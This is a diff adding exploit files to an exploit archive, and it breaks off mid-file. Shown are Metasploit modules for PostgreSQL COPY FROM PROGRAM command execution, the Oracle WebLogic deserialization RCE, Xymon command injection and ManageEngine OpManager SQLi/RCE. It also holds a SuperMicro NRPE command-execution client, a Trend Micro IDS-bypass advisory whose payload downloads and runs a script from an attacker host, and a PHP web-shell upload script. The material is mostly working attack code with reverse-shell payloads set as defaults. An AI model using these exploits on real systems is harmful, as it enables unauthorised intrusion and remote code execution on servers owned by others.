+        Installations running Postgres 9.3 and above have functionality which allows for the superuser
+        and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.
+        This allows arbitrary command execution as though you have console access.
+
+        This module attempts to create a new table, then execute system commands in the context of
+        copying the command output into the table.
+
+        This module should work on all Postgres systems running version 9.3 and above.
+
+        For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl
+
+        For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp
+        Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload
+        or other customised command.
+      ),
+      'Author' => [
+        'Jacob Wilkin' # Exploit Author of Module
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2019-9193'],
+        ['URL', 'https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5'],
+        ['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
+      ],
+      'PayloadType' => 'cmd',
+      'Platform' => %w(linux unix win osx),
+      'Payload' => {
+      },
+      'Arch' => [ARCH_CMD],
+      'Targets'        =>
+        [
+          [
+            'Unix/OSX/Linux', {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'Payload' => 'cmd/unix/reverse_perl' }
+              }
+          ],[
+            'Windows - PowerShell (In-Memory)', {
+              'Platform' => 'windows',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'Payload' => 'cmd/windows/powershell_reverse_tcp' }
+              }
+          ],[
+            'Windows (CMD)',
+            'Platform'   => 'win',
+            'Arch'       => [ARCH_CMD],
+            'Payload' => {
+              'Compat'     => {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'adduser, generic'
+              }
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Mar 20 2019'
+    ))
+
+    register_options([
+      Opt::RPORT(5432),
+      OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
+      OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
+      ])
+
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+  end
+
+  # Return the datastore value of the same name
+  # @return [String] tablename for table to use with command execution
+  def tablename
+    datastore['TABLENAME']
+  end
+
+  def check
+    vuln_version? ? CheckCode::Appears : CheckCode::Safe
+  end
+
+  def vuln_version?
+    version = postgres_fingerprint
+    return false unless version[:auth]
+    vprint_status version[:auth].to_s
+    version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
+    if Gem::Version.new(version_full) >= Gem::Version.new('9.3')
+      return true
+    else
+      return false
+    end
+  end
+
+  def login_success?
+    status = do_login(username, password, database)
+    case status
+    when :noauth
+      print_error "#{peer} - Authentication failed"
+      return false
+    when :noconn
+      print_error "#{peer} - Connection failed"
+      return false
+    else
+      print_status "#{peer} - #{status}"
+      return true
+    end
+  end
+
+  def execute_payload
+    # Drop table if it exists
+    query = "DROP TABLE IF EXISTS #{tablename};"
+    drop_query = postgres_query(query)
+    case drop_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} dropped successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Create Table
+    query = "CREATE TABLE #{tablename}(filename text);"
+    create_query = postgres_query(query)
+    case create_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} created successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Copy Command into Table
+    cmd_filtered = payload.encoded.gsub("'", "''")
+    query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
+    copy_query = postgres_query(query)
+    case copy_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
+        print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group'
+        return false
+      end
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    if datastore['DUMP_TABLE_OUTPUT']
+    # Select output from table for debugging
+      query = "SELECT * FROM #{tablename};"
+      select_query = postgres_query(query)
+      case select_query.keys[0]
+      when :conn_error
+        print_error "#{peer} - Connection error"
+        return false
+      when :sql_error
+        print_warning "#{peer} - Unable to execute query: #{query}"
+        return false
+      when :complete
+        print_good "#{peer} - #{tablename} contents:\n#{select_query}"
+        return true
+      else
+        print_error "#{peer} - Unknown"
+        return false
+      end
+    end
+    # Clean up table evidence
+    query = "DROP TABLE IF EXISTS #{tablename};"
+    drop_query = postgres_query(query)
+    case drop_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} dropped successfully(Cleaned)"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+  end
+
+  def do_login(user, pass, database)
+    begin
+      password = pass || postgres_password
+      result = postgres_fingerprint(
+        db: database,
+        username: user,
+        password: password
+      )
+
+      return result[:auth] if result[:auth]
+      print_error "#{peer} - Login failed"
+      return :noauth
+
+    rescue Rex::ConnectionError
+      return :noconn
+    end
+  end
+
+  def exploit
+    #vuln_version doesn't seem to work
+    #return unless vuln_version?
+    return unless login_success?
+    print_status("Exploiting...")
+    if execute_payload
+      print_status("Exploit Succeeded")
+    else
+      print_error("Exploit Failed")
+    end
+    postgres_logout if @postgres_conn
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/46814.rb b/exploits/multiple/remote/46814.rb
new file mode 100755
index 000000000..2fed80d01
--- /dev/null
+++ b/exploits/multiple/remote/46814.rb
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
+      'Description' => %q{
+        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
+        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
+        to execute code on the vulnerable host.
+      },
+      'Author' =>
+        [
+        'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>',  # Metasploit Module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2019-2725'],
+          ['CNVD-C', '2019-48814'],
+          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
+          ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
+        ],
+      'Privileged' => false,
+      'Platform' => %w{ unix win solaris },
+      'Targets' =>
+        [
+          [ 'Unix',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
+          ],
+          [ 'Windows',
+            'Platform' => 'win',
+            'Arch' => [ARCH_X64, ARCH_X86],
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+          ],
+          [ 'Solaris',
+            'Platform' => 'solaris',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
+            'Payload' => {
+              'Space'       => 2048,
+              'DisableNops' => true,
+              'Compat'      =>
+                {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'generic perl telnet',
+                }
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 12
+        },
+      'DisclosureDate' => 'Apr 23 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(7001),
+        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
+        OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'      => normalize_uri(datastore['WSPATH']),
+      'method'   => 'POST',
+      'ctype'    => 'text/xml',
+      'headers'  => {'SOAPAction' => '' }
+    )
+
+    if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
+      vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
+      vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
+      Exploit::CheckCode::Vulnerable
+    elsif res && res.code != 202
+      vprint_status("The target returned a non-vulnerable HTTP code")
+      Exploit::CheckCode::Safe
+    elsif res.nil?
+      vprint_status("The target did not respond in an expected way")
+      Exploit::CheckCode::Unknown
+    else
+      vprint_status("The target returned HTTP code: #{res.code}")
+      vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    print_status("Generating payload...")
+    case target.name
+    when 'Windows'
+      string0_cmd = 'cmd.exe'
+      string1_param = '/c'
+      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
+    when 'Unix','Solaris'
+      string0_cmd = '/bin/bash'
+      string1_param = '-c'
+      shell_payload = payload.encoded
+    end
+
+    random_action = rand_text_alphanumeric(20)
+    random_relates = rand_text_alphanumeric(20)
+
+    soap_payload =  %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
+    soap_payload <<   %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
+    soap_payload <<   %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
+    soap_payload <<   %Q|<soapenv:Header>|
+    soap_payload <<     %Q|<wsa:Action>#{random_action}</wsa:Action>|
+    soap_payload <<     %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
+    soap_payload <<     %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
+    soap_payload <<       %Q|<void class="java.lang.ProcessBuilder">|
+    soap_payload <<         %Q|<array class="java.lang.String" length="3">|
+    soap_payload <<           %Q|<void index="0">|
+    soap_payload <<             %Q|<string>#{string0_cmd}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<           %Q|<void index="1">|
+    soap_payload <<             %Q|<string>#{string1_param}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<           %Q|<void index="2">|
+    soap_payload <<             %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
+   #soap_payload <<             %Q|<string>#{xml_encode(shell_payload)}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<         %Q|</array>|
+    soap_payload <<       %Q|<void method="start"/>|
+    soap_payload <<       %Q|</void>|
+    soap_payload <<     %Q|</work:WorkContext>|
+    soap_payload <<   %Q|</soapenv:Header>|
+    soap_payload <<   %Q|<soapenv:Body>|
+    soap_payload <<     %Q|<asy:onAsyncDelivery/>|
+    soap_payload <<   %Q|</soapenv:Body>|
+    soap_payload << %Q|</soapenv:Envelope>|
+
+    uri = normalize_uri(datastore['WSPATH'])
+    if uri.nil?
+      datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
+    end
+
+    print_status("Sending payload...")
+
+    begin
+      res = send_request_cgi(
+        'uri'      => uri,
+        'method'   => 'POST',
+        'ctype'    => 'text/xml',
+        'data'     => soap_payload,
+        'headers'  => {'SOAPAction' => '' }
+      )
+    rescue Errno::ENOTCONN
+      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
+    end
+
+    if res.nil?
+      fail_with(Failure::Unreachable, "No response from host")
+    elsif res && res.code != 202
+      fail_with(Failure::UnexpectedReply,"Exploit failed.  Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47030.py b/exploits/multiple/remote/47030.py
new file mode 100755
index 000000000..4702913a9
--- /dev/null
+++ b/exploits/multiple/remote/47030.py
@@ -0,0 +1,145 @@
+# SuperMicro implemented a Remote Command Execution plugin in their implementation of 
+# NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'.
+# This is an intended feature but leaves the system open (by default) to unauthenticated
+# remote command execution by abusing the 'executable' plugin with an NRPE client.
+# 
+# For your pleasure, here is a PoC Python NRPE Client that will connect, execute the 
+# cmd of choice and return its output.
+#
+# To mitigate this vulnerbility, edit your agent.cfg to specificy which IPs are allowed 
+# to execute NRPE commands agaist the system and/or block traffic on port 5666.
+#
+# NRPE cannot be disabled in this software, see Guide section 3.2
+
+
+#Author: Simon Gurney 
+#Date: 23/05/2019
+#Vendor: SuperMicro
+#Product: SuperMicro Super Doctor 5
+#Version: 5
+#Guide: ftp://supermicro.com/ISO_Extracted/CDR-C9_V1.00_for_Intel_C9_platform/SuperDoctor_V/Linux/SuperDoctor5_UserGuide.pdf
+
+
+
+### Configurables
+
+command = "ping 1.1.1.1 -n 1"
+target = "1.2.3.4"
+target_port = 5666
+
+### Don't need to change anything below
+
+import binascii
+import struct
+import socket
+import ssl
+
+#### Struct Encoding Types
+StructCodeInt16 = "!h" ## Unsigned Int16
+StructCodeInt32 = "!L" ## Unsigned Int32
+
+#### NRPE Specific definitions
+NRPE_Version = ("","One", "Two", "Three")
+NRPE_Packet_Type = ("", "Query", "Response")
+NRPE_Response = ("Ok", "Warning", "Critical", "Unknown")
+NRPE_Version_1 = 1
+NRPE_Version_2 = 2
+NRPE_Version_3 = 3
+NRPE_Packet_Type_Query = 1
+NRPE_Packet_Type_Response = 2
+NRPE_Response_Ok = 0
+NRPE_Response_Warning = 1
+NRPE_Response_Critical = 2
+NRPE_Response_Unknown = 3
+NRPE_Response_Type_Query = 3
+
+#### RandomDefintions
+NullByte = b"\x00"
+TwoCharSuffix = "SG"
+
+class NRPEpacket:
+	port = 5666
+	server = "127.0.0.1"
+	nrpeVersion = NRPE_Version_2
+	nrpePacketType = NRPE_Packet_Type_Query
+	nrpeResponseCode = NRPE_Response_Type_Query
+	ownSocket = None
+	def CalculateCRC(self):
+		tempBuffer = struct.pack(StructCodeInt16,self.nrpeVersion)
+		tempBuffer += struct.pack(StructCodeInt16,self.nrpePacketType)
+		tempBuffer += NullByte * 4
+		tempBuffer += struct.pack(StructCodeInt16,self.nrpeResponseCode)
+		tempBuffer += self.content
+		return (struct.pack(StructCodeInt32, binascii.crc32(tempBuffer) & 0xffffffff))
+	def PadTo1024Bytes(self,command):
+		if len(command) <= 1024:
+			tempBuffer = command
+		else:
+			Error("Command string is too long!")
+		while len(tempBuffer) < 1024:
+			tempBuffer += "\x00"
+		tempBuffer += TwoCharSuffix
+		return tempBuffer.encode()
+	def Connect(self):
+		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		self.socket.connect((self.server,self.port))
+	def WrapSSL(self):
+		self.socket = ssl.wrap_socket(self.socket,cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23, ciphers="ALL")
+	def Send(self):
+		tempBuffer = struct.pack(StructCodeInt16,self.nrpeVersion)
+		tempBuffer += struct.pack(StructCodeInt16,self.nrpePacketType)
+		tempBuffer += self.crc
+		tempBuffer += struct.pack(StructCodeInt16,self.nrpeResponseCode)
+		tempBuffer += self.content
+		self.socket.send(tempBuffer)
+	def Recv(self):
+		tempBuffer = self.socket.recv(2048)
+		self.nrpeVersion = struct.unpack(StructCodeInt16,tempBuffer[0:2])[0]
+		self.nrpePacketType = struct.unpack(StructCodeInt16,tempBuffer[2:4])[0]
+		self.crc = tempBuffer[4:8]
+		self.nrpeResponseCode = struct.unpack(StructCodeInt16,tempBuffer[8:10])[0]
+		self.content = tempBuffer[10:]
+		if self.crc != self.CalculateCRC():
+			print ("CRC does not match!")
+	def PrintOut(self):
+		print(" -=-=-=-= Begin NRPE Content =-=-=-=-")
+		print("| NRPE Version       =  %i  -  %s" % (self.nrpeVersion,NRPE_Version[self.nrpeVersion]))
+		print("| NRPE Packet Type   =  %i  -  %s" % (self.nrpePacketType,NRPE_Packet_Type[self.nrpePacketType]))
+		print("| NRPE Packet CRC    =  %i" % struct.unpack(StructCodeInt32,self.crc)[0])
+		print("| NRPE Response Code =  %i  -  %s" % (self.nrpeResponseCode,NRPE_Response[self.nrpeResponseCode]))
+		print("| Packet Content:")
+		print("| %s" % self.content.decode().strip(TwoCharSuffix).strip("\x00"))
+		print(" -=-=-=-= End NRPE Content =-=-=-=-")
+	def Close(self):
+		if not self.ownSocket:
+			self.socket.close()
+	def AutoSend(self):
+		print("Sending...")
+		self.PrintOut()
+		self.Send()
+		print("Receiving...")
+		self.Recv()
+		self.PrintOut()
+		self.Close()
+	def __init__(self, command, socket=None, server=None, port = None, ssl=True):
+		self.content = self.PadTo1024Bytes(command)
+		self.crc = self.CalculateCRC()
+		if server:
+			self.server = server
+		if port:
+			self.port = port
+		if not socket:
+			self.Connect()
+		else:
+			self.socket = socket
+			self.ownSocket = True
+		if ssl == True:
+			self.WrapSSL()
+
+			
+#NRPE CMD format is "executable!<binary>!<arguments> i.e."
+#NRPEpacket("executable!ping!1.1.1.1 -n 1", server="1.2.3.4").AutoSend()
+
+split = command.split(" ",1)
+cmd = "executable!" + split[0] + "!" + split[1]
+NRPEpacket(cmd, server=target, port=target_port).AutoSend()
\ No newline at end of file
diff --git a/exploits/multiple/remote/47114.rb b/exploits/multiple/remote/47114.rb
new file mode 100755
index 000000000..957abf33b
--- /dev/null
+++ b/exploits/multiple/remote/47114.rb
@@ -0,0 +1,188 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Xymon useradm Command Execution',
+      'Description' => %q{
+        This module exploits a command injection vulnerability in Xymon
+        versions before 4.3.25 which allows authenticated users
+        to execute arbitrary operating system commands as the web
+        server user.
+
+        When adding a new user to the system via the web interface with
+        `useradm.sh`, the user's username and password are passed to
+        `htpasswd` in a call to `system()` without validation.
+
+        This module has been tested successfully on Xymon version 4.3.10
+        on Debian 6.
+      },
+      'License'     => MSF_LICENSE,
+      'Author'      => [
+        'Markus Krell', # Discovery
+        'bcoles'        # Metasploit
+      ],
+      'References'  =>
+        [
+          ['CVE', '2016-2056'],
+          ['PACKETSTORM', '135758'],
+          ['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'],
+          ['URL', 'https://www.securityfocus.com/archive/1/537522/100/0/threaded'],
+          ['URL', 'https://sourceforge.net/p/xymon/code/7892/'],
+          ['URL', 'https://www.debian.org/security/2016/dsa-3495']
+        ],
+      'DisclosureDate' => '2016-02-14',
+      'Platform'       => %w(unix linux solaris bsd),
+      'Targets'        =>
+        [
+          [
+            'Unix CMD',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Payload' => {
+                'Space' => 2048,
+                'BadChars' => "\x00\x0A\x0D",
+                'DisableNops' => true,
+                'Compat' =>
+                {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'generic perl python netcat php'
+                }
+              }
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch'     => [ARCH_X86,ARCH_X64],
+            }
+          ],
+          [
+            'Solaris',
+            {
+              'Platform' => 'solaris',
+              'Arch' => [ARCH_X86]
+            }
+          ],
+          [
+            'BSD',
+            {
+              'Platform' => 'bsd',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0))
+    register_options([
+      OptString.new('TARGETURI', [
+        true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/'
+      ]),
+      OptString.new('USERNAME', [true, 'The username for Xymon']),
+      OptString.new('PASSWORD', [true, 'The password for Xymon'])
+    ])
+  end
+
+  def user
+    datastore['USERNAME']
+  end
+
+  def pass
+    datastore['PASSWORD']
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
+      'authorization' => basic_auth(user, pass)
+    })
+
+    unless res
+      vprint_status "#{peer} - Connection failed"
+      return CheckCode::Unknown
+    end
+
+    if res.code == 401
+      vprint_status "#{peer} - Authentication failed"
+      return CheckCode::Unknown
+    end
+
+    if res.code == 404
+      vprint_status "#{peer} - useradm.sh not found"
+      return CheckCode::Safe
+    end
+
+    unless res.body.include?('Xymon')
+      vprint_status "#{peer} - Target is not a Xymon server."
+      return CheckCode::Safe
+    end
+
+    version = res.body.scan(/>Xymon ([\d\.]+)</).flatten.first
+
+    unless version
+      vprint_status "#{peer} - Could not determine Xymon version"
+      return CheckCode::Detected
+    end
+
+    vprint_status "#{peer} - Xymon version #{version}"
+
+    if Gem::Version.new(version) >= Gem::Version.new('4.3.25')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
+  def execute_command(cmd, opts = {})
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
+      'method' => 'POST',
+      'authorization' => basic_auth(user, pass),
+      'vars_post' => Hash[{
+        'USERNAME'   => "';#{cmd} & echo '",
+        'PASSWORD'   => '',
+        'SendCreate' => 'Create'
+      }.to_a.shuffle]
+    }, 5)
+
+    return if session_created?
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res.code == 401
+      fail_with(Failure::NoAccess, 'Authentication failed')
+    end
+
+    unless res.code == 500
+      fail_with(Failure::Unknown, 'Unexpected reply')
+    end
+
+    print_good "#{peer} - Payload sent successfully"
+
+    res
+  end
+
+  def exploit
+    unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check)
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if payload.arch.first == 'cmd'
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(linemax: 1_500)
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47155.txt b/exploits/multiple/remote/47155.txt
new file mode 100644
index 000000000..60a476b6c
--- /dev/null
+++ b/exploits/multiple/remote/47155.txt
@@ -0,0 +1,104 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
+[+] ISR: Apparition Security         
+ 
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product]
+Deep Discovery Inspector
+
+Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks
+moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker
+activities that are invisible to standard security defenses.
+
+
+
+[Vulnerability Type]
+Percent Encoding IDS Bypass
+
+
+[CVE Reference]
+Vendor decided not to release a CVE
+
+
+[Security Issue]
+Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high.
+Attacker payloads sent with normal ascii characters for example like "wget" or even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get flagged and alerted on.
+
+However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also translates to "wget" and
+will not get flagged or alerted on and may still be processed on the target system.
+
+e.g.
+
+DDI RULE 2452 
+https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452
+
+Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74.
+That will not only bypass the IDE by having no alert triggered or notification sent but the application will still process the malicious command.
+
+Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for
+percent encoded HEX character payload values. 
+
+
+[Exploit/POC]
+from socket import *
+#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
+#Discovery: hyp3rlinx - ApparitionSec
+#Apparition Security
+#Firewall Rule Bypass
+
+IP = raw_input("[+] Trend Micro IDS")
+PORT = 80
+
+payload="/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a"
+req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n"
+
+s=socket(AF_INET, SOCK_STREAM)
+s.connect((IP, PORT))
+s.send(req)
+res=""
+
+while True:
+    res = s.recv(512)
+    print res
+    if res=="\n" or "</html>":
+        break
+
+s.close()
+
+
+#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered.
+
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+
+[Disclosure Timeline]
+Vendor Notification: May 14, 2019
+Vendor confirmed the IDS Bypass: May 20, 2019
+Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
+July 23, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/multiple/remote/47209.py b/exploits/multiple/remote/47209.py
new file mode 100755
index 000000000..fdc16df86
--- /dev/null
+++ b/exploits/multiple/remote/47209.py
@@ -0,0 +1,11 @@
+import requests
+
+URL = "http://127.0.0.1/ARMBot/upload.php"
+r = requests.post(URL,
+                  data = {
+                     "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
+                     "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
+                     "message":"Bobr Dobr"
+                  }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
+print(r.status_code)
+print("shell should be at http://{}/.s.phtml".format(URL))
\ No newline at end of file
diff --git a/exploits/multiple/remote/47227.rb b/exploits/multiple/remote/47227.rb
new file mode 100755
index 000000000..fbe2778e0
--- /dev/null
+++ b/exploits/multiple/remote/47227.rb
@@ -0,0 +1,408 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution",
+      'Description'    => %q(
+        This module exploits sqli and command injection vulnerability in the OpManager v12.4.034 and prior versions.
+ 
+        Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides privilege escalation.
+        Therefore low authority user can gain the authority of "system" on the server. 
+        It uploads malicious file using the "Execute Program Action(s)" feature of Application Manager Plugin.
+
+        /////// This 0day has been published at DEFCON-AppSec Village. ///////
+
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-OpManager-v12-4-Privilege-Escalation-Remote-Command-Execution.html' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 60,
+          'RPORT' => 8060,
+          'SSL' => false,
+          'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['unix', 'win'],
+      'Targets' =>
+        [
+          [ 'Windows Target',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+            }
+          ],
+          [ 'Linux Target',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                    }
+                }
+            }
+          ]
+        ],
+      'DisclosureDate' => '10 August 2019 //DEFCON',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'OpManager Username']),
+        OptString.new('PASSWORD',  [true, 'OpManager Password']),
+        OptString.new('TARGETURI',  [true, 'Base path for ME application', '/'])
+      ],self.class)
+  end
+
+  def check_platform(host, port, cookie)
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'TileName' => '.ExecProg',
+        'haid' => 'null',
+      }
+    )
+    if res && res.code == 200 && res.body.include?('createExecProgAction')
